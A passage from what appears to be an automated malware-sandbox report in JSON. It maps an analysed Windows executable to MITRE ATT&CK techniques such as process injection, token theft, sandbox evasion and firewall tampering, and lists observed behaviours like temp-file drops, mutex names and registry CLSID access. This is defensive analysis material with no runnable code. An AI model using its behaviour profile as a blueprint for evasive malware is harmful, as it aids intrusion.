"informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nhhyjsjl.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74ED0000\n \"netsh.exe\" loaded module 